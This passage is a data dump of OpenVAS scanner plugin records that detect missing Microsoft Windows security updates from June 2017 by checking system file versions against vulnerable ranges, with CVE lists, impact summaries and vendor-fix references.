critical security\n update according to Microsoft KB4022727", "cvss3": {}, "published": "2017-06-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022727)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811196", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022727)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811196\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\",\n \"CVE-2017-8547\", \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8492\", \"CVE-2017-8493\",\n \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\", \"CVE-2017-8524\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98897, 98898, 98885, 98853, 98903,\n 
98953, 98863, 98819, 98920, 98918, 98854, 98845, 98820, 98914,\n 98856, 98857, 98821, 98824, 98922, 98923, 98862, 98858, 98859,\n 98826, 98932, 98954, 98955, 98929, 98835, 98836, 98847, 98860,\n 98837, 98839, 98865, 98840, 98867, 98869, 98884, 98901, 98887,\n 98870, 98850, 98855, 98900, 98818, 98848, 98849, 98926, 98928,\n 98930, 98843, 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-15 16:09:05 +0530 (Thu, 15 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection (DIBSection) function.\n\n - Displays turn off unexpectedly even when 'Turn off display' is set to 'Never' in\n Power Options.\n\n - certutil.exe can no longer generate an export file (.epf) when attempting to\n recover a key for a version 1 certificate.\n\n - MSI files will no longer install when Device Guard is enabled.\n\n - A thin client becomes unusable and unresponsive when Unified Write Filter\n (UWF) with DISK mode is enabled causing NTFS errors with ID: 55 & ID: 130\n to be logged in the Event Logs.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. 
If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then\n install programs. View, change, or delete data, or create new accounts with full\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for 32bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17442\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10240.0 - 11.0.10240.17442\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:48:08", "description": "This host is missing a critical security\n update according to Microsoft KB4022715", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": 
"openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022715)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310810903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022715)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or 
any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810903\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-0215\", \"CVE-2017-0216\", \"CVE-2017-0218\",\n \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\", \"CVE-2017-8476\",\n \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0284\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8496\", \"CVE-2017-8497\",\n \"CVE-2017-8498\", \"CVE-2017-8504\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8515\",\n 
\"CVE-2017-8517\", \"CVE-2017-0173\", \"CVE-2017-0193\", \"CVE-2017-8473\",\n \"CVE-2017-8474\", \"CVE-2017-8527\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8576\", \"CVE-2017-8518\");\n script_bugtraq_id(98848, 98849, 98926, 98928, 98930, 98879, 98896, 98897, 98898,\n 98885, 98853, 98903, 98953, 98863, 98819, 98920, 98854, 98845,\n 98820, 98821, 98918, 98914, 98856, 98857, 98862, 98824, 98922,\n 98923, 98858, 98859, 98826, 98932, 98954, 98955, 98929, 98835,\n 98836, 98847, 98860, 98940, 98837, 98904, 98839, 98865, 98840,\n 98867, 98869, 98870, 98884, 98901, 98887, 98850, 98855, 98880,\n 98882, 98886, 98892, 98900, 98818, 98843, 98844, 98846, 98833,\n 98895, 98873, 98878, 98852, 98902, 98933);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 08:44:33 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022715)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way the Microsoft Edge JavaScript scripting engine handles objects\n in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Secure Kernel Mode fails to properly handle objects in memory.\n\n - Microsoft Edge Fetch API incorrectly handles a filtered response type.\n\n - Windows GDI component improperly discloses the contents of its 
memory.\n\n - Microsoft scripting engines do not properly handle objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n For more information please check the Reference URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n obtain sensitive information to further compromise the user's system and to\n bypass security.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022715\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1355\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1355\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:37", "description": "This host is missing a critical security\n update according to Microsoft KB4022719", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022719)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022719)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811173\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\",\n \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\",\n \"CVE-2017-8543\", \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8547\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\",\n \"CVE-2017-0300\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8524\", \"CVE-2017-8519\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821,\n 98914, 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923,\n 98929, 98858, 98859, 98932, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98900,\n 
98818, 98842, 98848, 98849, 98930, 98899);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 16:22:36 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022719)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022719\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - An issue with updates are not correctly installing all components and\n would prevent them from booting.\n\n - An unsupported hardware notification is shown and Windows Updates not\n scanning, for systems using the AMD Carrizo DDR4 processor.\n\n - An error in Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM,\n Internet Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user and take control of an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022719\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.7601.23834\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.7601.23834\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:44", "description": "This host is missing a critical security\n update according to Microsoft KB4022724", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", 
"CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811171", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811171\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0289\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\", \"CVE-2017-8522\",\n \"CVE-2017-8469\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98953, 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821,\n 98914, 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826,\n 98932, 98929, 98835, 98836, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98840, 98867, 98869, 98870, 98884, 98901, 98887,\n 98900, 98818, 98848, 98849, 98899, 98926, 98842, 98895);\n script_tag(name:\"cvss_base\", 
value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 15:20:54 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - After installing KB3164035, users cannot print enhanced\n metafiles (EMF) or documents containing bitmaps rendered out of bounds using the\n BitMapSection(DIBSection) function.\n\n - Updates were not correctly installing all components and would prevent them from\n booting.\n\n - An unsupported hardware notification is shown and Windows Updates not scanning,\n for systems using the AMD Carrizo DDR4 processor.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM, Internet\n 